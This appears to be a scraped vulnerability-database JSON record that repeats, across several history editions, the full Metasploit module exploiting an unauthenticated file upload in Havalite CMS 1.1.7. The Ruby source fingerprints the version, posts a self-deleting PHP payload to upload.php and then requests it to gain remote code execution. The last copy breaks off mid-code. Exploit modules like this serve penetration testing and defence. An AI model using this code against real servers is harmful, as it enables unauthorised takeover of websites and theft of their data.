{"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-12T23:28:37", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-12T23:28:37", "differentElements": ["modified", "published"], "edition": 60}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T13:26:25", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-19T13:26:25", "differentElements": ["modified", "published"], "edition": 61}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T15:27:00", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-19T15:27:00", "differentElements": ["modified", "published"], "edition": 62}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T17:25:31", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-19T17:25:31", "differentElements": ["modified", "published"], "edition": 63}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T19:26:55", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-19T19:26:55", "differentElements": ["modified", "published"], "edition": 64}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-10T07:52:31", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-09-10T07:52:31", "differentElements": ["modified", "published"], "edition": 65}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "3e0e8d75c29a5307c285afd3963ff327", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-17T20:10:40", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = 